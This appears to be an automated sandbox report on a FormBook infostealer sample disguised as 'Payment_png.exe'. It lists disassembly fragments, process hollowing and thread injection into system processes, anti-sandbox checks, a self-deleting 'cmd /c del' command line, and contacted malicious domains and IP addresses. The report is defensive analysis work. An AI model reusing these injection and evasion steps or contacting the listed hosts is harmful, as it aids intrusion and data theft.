      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DF0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E90AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E43B8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A9080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E423884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E423884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A58EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CB8E4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CB8E4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C4120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3AB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3AB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3AC962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C99BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C99BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C99BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C99BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4341E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D2990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DA185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CC182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4649A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4649A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4649A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4649A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4269A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4251BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4251BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4251BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4251BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_00564377 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_00564B11 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_00563BE9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_00562410 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CD8CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC14FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C86CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C86CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C86CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C1849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C3A44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C9C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C9C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C2746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C2B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C2B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C2B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C2B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C2B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C2B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C2B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C2B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C2B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C2B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C2B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C2B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C3AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C3AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C3AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C3AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C3AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C3AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C3AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C3AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C3AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C3AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C3AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CD740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CD740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CD740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C86C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C86C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C86C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C86C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C3BC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C86DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C86DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C86DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C86DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C86DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C86DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C1D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C1D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CCFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CCFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CCFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CCFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CB8DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C32581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C32581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C32581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C32581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C02D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C02D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C02D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C02D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C02D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C3FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C3FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CD05AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CD05AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C335A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\colorcpl.exeProcess token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.218 80
      Source: C:\Windows\explorer.exeDomain query: www.loversdeal.com
      Source: C:\Windows\explorer.exeDomain query: www.uforservice.com
      Source: C:\Windows\explorer.exeDomain query: www.slutefuter.com
      Source: C:\Windows\explorer.exeDomain query: www.booksfall.com
      Source: C:\Windows\explorer.exeNetwork Connect: 66.96.160.133 80
      Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.32 80
      Source: C:\Windows\explorer.exeDomain query: www.plowbrothers.com
      Source: C:\Windows\explorer.exeDomain query: www.choupisson.com
      Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.233 80
      Source: C:\Windows\explorer.exeNetwork Connect: 35.246.6.109 80
      Source: C:\Windows\explorer.exeDomain query: www.domennyarendi39.net
      Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
      Source: C:\Windows\explorer.exeDomain query: www.birkenhof-allgaeu.net
      Source: C:\Windows\explorer.exeDomain query: www.pcpartout.com
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\user\Desktop\Payment_png.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\Payment_png.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\Payment_png.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\Payment_png.exeThread register set: target process: 3388
      Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 3388
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\Payment_png.exeThread APC queued: target process: C:\Windows\explorer.exe
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\user\Desktop\Payment_png.exeSection unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: E70000
      Source: C:\Users\user\Desktop\Payment_png.exeProcess created: C:\Users\user\Desktop\Payment_png.exe 'C:\Users\user\Desktop\Payment_png.exe'
      Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment_png.exe'
      Source: explorer.exe, 00000006.00000002.469681578.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
      Source: explorer.exe, 00000006.00000002.470675948.0000000001980000.00000002.00000001.sdmp, colorcpl.exe, 0000000E.00000002.470825013.00000000034A0000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000006.00000002.470675948.0000000001980000.00000002.00000001.sdmp, colorcpl.exe, 0000000E.00000002.470825013.00000000034A0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000006.00000002.470675948.0000000001980000.00000002.00000001.sdmp, colorcpl.exe, 0000000E.00000002.470825013.00000000034A0000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000006.00000002.470675948.0000000001980000.00000002.00000001.sdmp, colorcpl.exe, 0000000E.00000002.470825013.00000000034A0000.00000002.00000001.sdmpBinary or memory string: Progmanlock

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, type: MEMORY
      Yara detected Generic DropperShow sources
      Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 2988, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: Payment_png.exe PID: 3112, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsShared Modules1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion22OS Credential DumpingSecurity Software Discovery721Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemoryVirtualization/Sandbox Evasion22Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol114SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsSystem Information Discovery31SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 377352 Sample: Payment_png.exe Startdate: 29/03/2021 Architecture: WINDOWS Score: 100 29 www.silverdollarcafe.com 2->29 31 www.accinf5.com 2->31 33 silverdollarcafe.com 2->33 45 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 9 other signatures 2->51 11 Payment_png.exe 1 2->11         started        signatures3 process4 signatures5 61 Contains functionality to detect hardware virtualization (CPUID execution measurement) 11->61 63 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 11->63 65 Tries to detect Any.run 11->65 67 3 other signatures 11->67 14 Payment_png.exe 6 11->14         started        process6 dnsIp7 41 www.aps-mm.com 14->41 43 aps-mm.com 170.249.199.106, 443, 49712, 49713 PRIVATESYSTEMSUS United States 14->43 69 Modifies the context of a thread in another process (thread injection) 14->69 71 Tries to detect Any.run 14->71 73 Maps a DLL or memory area into another process 14->73 75 3 other signatures 14->75 18 explorer.exe 14->18 injected signatures8 process9 dnsIp10 